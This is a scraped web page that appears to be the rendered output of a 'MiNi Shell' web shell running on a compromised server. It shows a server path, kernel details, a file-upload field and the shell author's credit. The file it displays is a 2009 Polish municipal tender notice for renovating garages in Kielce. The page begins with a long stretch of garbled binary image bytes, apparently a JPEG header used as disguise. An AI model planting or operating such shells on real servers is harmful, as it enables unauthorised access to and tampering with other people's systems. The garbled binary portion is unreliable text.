JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090515/151748-N-2009.html

<p class="kh_header"><b>Kielce: Remont zespołu wolnostojących garaży Urzędu Miasta z wymianą bram garażowych i pokrycia dachu przy ul. Strycharskiej 6 w Kielcach</b><br>
<b>Numer ogłoszenia: 151748 - 2009; data zamieszczenia: 15.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Obsługi i Informatyki Urzędu Miasta Kielce , Rynek 1, 25-303 Kielce, woj. świętokrzyskie, tel. 041 3676236, faks 041 3676306.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.kielce.pl/pl/zoum_strona_glowna/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont zespołu wolnostojących garaży Urzędu Miasta z wymianą bram garażowych i pokrycia dachu przy ul. Strycharskiej 6 w Kielcach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: 
Wykonanie robót remontowo-budowlanych zespołu 10 garaży wolnostojących, 
a w szczególności:
1.	Elewacja:
1.1.	usunięcie starych powłok malarskich, 
1.2.	wykonanie gruntowania, zabezpieczenia i wzmocnienia podłoża elewacji,
1.3.	przecieranie istniejących tynków,
1.4.	wykonanie wyprawy elewacyjnej z tynku mineralnego,
1.5.	wymiana bram garażowych.

2.	Dach:
2.1.	rozebranie pokrycia dachowego papy,
2.2.	demontaż obróbek blacharskich rynien i rur spustowych,
2.3.	wykonanie pokrycia dachowego z papy termozgrzewalnej,
2.4.	wykonanie orynnowania i obróbek blacharskich.

3.	Roboty wewnętrzne:
3.1.	wymiana posadzek betonowych,
3.2.	wykonanie obramowań i przekryć kanałów obsługowych,
3.3.	usunięcie starych powłok malarskich ścian i sufitów,
3.4.	przygotowanie powierzchni tynków pod roboty malarskie,
3.5.	gruntowanie i dwukrotne malowanie tynków farbami emulsyjnymi.

4.	Instalacja elektryczna zalicznikowa w czterech garażach:
4.1.	Demontaż istniejącej instalacji oświetleniowej i gniazd wtykowych,
4.2.	Wykonanie instalacji oświetleniowej,
4.3.	Wykonanie instalacji gniazd wtykowych.

1)	Szczegółowy zakres robót oraz warunki ich realizacji zawierają:
a)	kosztorys ślepy z przedmiarem robót, stanowiący zał. Nr 9 SIWZ,
b)	wzór umowy, stanowiący zał. Nr 4 do SIWZ.
2)	Prace objęte przedmiotem zamówienia winny być wykonane zgodnie z warunkami zawartymi w niniejszej SIWZ oraz wzorem umowy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.26.90-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w kwocie:  2 000,00 PLN (słownie: dwa tysiące złotych 00.100).
2.	Wadium wnosi się przed upływem terminu składania ofert. 
3.	Wadium może być wniesione w:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt.2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
4.	Jeżeli wadium wpłacane jest w pieniądzu, termin zachowany jest tylko wtedy, jeżeli pieniądze wpłyną na rachunek bankowy Zamawiającego przed upływem terminu składania ofert. 
5.	 Dowód wniesienia wadium należy załączyć do oferty. 
W przypadku wniesienia wadium w pieniądzu, załącznikiem do oferty może być oryginał lub kopia potwierdzenia wykonania przelewu wadium poświadczona (za zgodność z oryginałem) przez Wykonawcę. 
Dla pozostałych form wniesienia wadium wymagane jest złożenie dokumentu w oryginale.
6.	Wadium wnoszone w pieniądzu należy wpłacić przelewem (operacja bezgotówkowa) na konto:
Bank Gospodarki Żywnościowej S.A. Oddział Regionalny w Kielcach
Nr  79 2030 0045 1110 0000 0027 3290
z dopiskiem: (Wadium na  remont zespołu wolnostojących garaży Urzędu Miasta z wymianą bram garażowych i pokrycia dachu przy ul. Strycharskiej 6)
Wyklucza się dokonywanie wpłat gotówkowych na rachunek Zamawiającego.
7.	Zwrot wadium nastąpi na warunkach określonych w art. 46 ust.1 i 2 ustawy Pzp.
8.	Zamawiający zażąda ponownego wniesienia wadium przez Wykonawców, którzy zostali wykluczeni z postępowania lub których oferty zostały odrzucone, a którym zwrócono wadium, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia Wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
9.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca:
a)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach   określonych w ofercie,
b)	nie wniesie zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
d)	w odpowiedzi na wezwanie, nie złoży oświadczeń i dokumentów lub pełnomocnictw, o których mowa w rozdziale X, potwierdzających spełnienie warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego nie później niż w dniu, w którym upłynął termin składania ofert chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie .
10.	 Gwarancja,poręczenie, stanowiąca formę wniesienia wadium, musi spełniać co najmniej następujące wymogi (pod rygorem wykluczenia Wykonawcy):
- ustalać beneficjenta, tj. Zakład Obsługi i Informatyki Urzędu Miasta  Kielce,
- określać kwotę gwarantowaną w złotych - w wysokości określonej w niniejszej SIWZ,
- określać termin ważności -nie krótszy niż okres związania ofertą wynikający z SIWZ,
- podawać przedmiot gwarancji,poręczenia - wynikający z SIWZ,
- gwarantować wypłatę w sposób nieodwołalny, bezwarunkowy, na każde żądanie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy:
1.	Spełniają warunki określone przepisami art. 22 ust.1 Pzp.
2.	Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 Pzp.
3.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.:
a)	dysponują lub będą dysponować osobami posiadającymi kwalifikacje zawodowe   niezbędne do wykonania zamówienia i przynależą do właściwej Izby Samorządu Zawodowego, tj.
- min. 1 osobą posiadającą uprawnienia budowlane do kierowania budową lub robotami budowlanymi w specjalności konstrukcyjno-budowlanej, pełniącego rolę kierownika budowy,
- udokumentują, że wymienione osoby, posiadają wymagane uprawnienia.
b)	wykonali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -    w tym okresie, co najmniej jedną robotę budowlaną w zakresie objętym przedmiotem zamienia o wartości co najmniej 50 000,00 PLN (brutto),                  z potwierdzeniem jej należytego wykonania.
4.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj.:
- posiadają lub zawrą przed podpisaniem umowy ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności co najmniej na okres od dnia podpisania umowy do dnia wykonania przedmiotu zamówienia na kwotę nie mniejszą niż 97 000,00 zł.

Warunki udziału w postępowaniu zostaną uznane za spełnione, jeżeli Wykonawca złoży dokumenty, o których mowa w rozdziale X SIWZ.
Ocena spełniania przez Wykonawców warunków udziału w postępowaniu zostanie dokonana według formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca zobowiązany jest złożyć w formie określonej w rozdz. XV i terminie wskazanym w rozdz. XVI SIWZ  następujące oświadczenia i dokumenty:

1.Wypełniony formularz:
a)	ofertowy - zał. Nr 1 do SIWZ .
Wymagana forma dokumentu - oryginał.
b)	oświadczenia o nie zleceniu/zleceniu części zamówienia podwykonawcom - zał. Nr 2  do  SIWZ. 
Wymagana forma dokumentu - oryginał.  
c)	oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych - zał. Nr 3 do SIWZ.
Wymagana forma dokumentu - oryginał.	

2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
     Wymagana forma dokumentu - oryginał lub kopia poświadczona przez Wykonawcę.

3. Wykaz osób posiadających uprawnienia budowlane do kierowania budową lub robotami budowlanymi wraz z informacjami na temat kwalifikacji zawodowych zgodnie z opisem w rozdziale VIII pkt. 3 SIWZ, wg wzoru określonego w zał. Nr 5 do SIWZ
Do wykazu należy załączyć uprawnienia budowlane w specjalności konstrukcyjno-budowlanej wraz z aktualnymi zaświadczeniami o przynależności do właściwej Izby Samorządu Zawodowego (ważne na dzień otwarcia ofert).
Wymagana forma dokumentów:
- wykaz osób z uprawnieniami do kierowania robotami budowlanymi - oryginał,
- uprawnienia budowlane - oryginał lub kopia poświadczona przez Wykonawcę,
- zaświadczenie o przynależności do właściwej Izby Samorządu Zawodowego - oryginał lub kopia poświadczona przez Wykonawcę.

4. Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, (min. 1-nej  roboty o wartości co najmniej 50 000,00 zł każda), z podaniem ich wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie - zgodnie z opisem w rozdz. VIII pkt. 3 i wzorem określonym w zał. Nr 6 do SIWZ.
	Wymagana forma dokumentów:
- wykaz wykonanych robót budowlanych - oryginał,
- dokumenty potwierdzające, że roboty budowlane zostały wykonane należycie - oryginał lub kopia poświadczona przez Wykonawcę.

5. Oświadczenie, że Wykonawca jest ubezpieczony lub zawrze ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności, co najmniej na okres od dnia podpisania umowy, aż do dnia zakończenia robót budowlanych, na kwotę minimum 97 000,00  zł. - zał. Nr 7 do SIWZ.
Wymagana forma dokumentu - oryginał oświadczenia lub kopia polisy ubezpieczenia  poświadczona przez Wykonawcę.

6. Pełnomocnictwo do podejmowania zobowiązań w imieniu Wykonawcy, określające jego zakres - w przypadku, gdy Wykonawcę reprezentuje  pełnomocnik. 
     Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza.

7. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia 
- pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia      publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego Wykonawców występujących wspólnie.
    Wspólnicy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia , określoną w art. 366 Kodeksu Cywilnego.
     Wymagana forma dokumentu - oryginał lub kopia poświadczona przez notariusza

8. Dokument potwierdzający wniesienie wadium - zgodnie z opisem w rozdz. XIII SIWZ.

9. Dokumenty wymagane od Wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium  Rzeczypospolitej Polskiej:

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 2 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;     
     Wymagana forma dokumentu - oryginał lub kopia poświadczona przez Wykonawcę.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.


UWAGA:
Oświadczenia i dokumenty powinny potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez Zamawiającego nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.kielce.pl/pl/zoum_strona_glowna/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Obsługi i Informatyki Urzędu  Miasta Kielce
25-659 Kielce,  ul. Strycharska 6, pok. nr 112.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2009 godzina 11:00, miejsce: Zakład Obsługi i Informatyki Urzędu  Miasta Kielce
25-659 Kielce,  ul. Strycharska 6, pok. nr 106 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com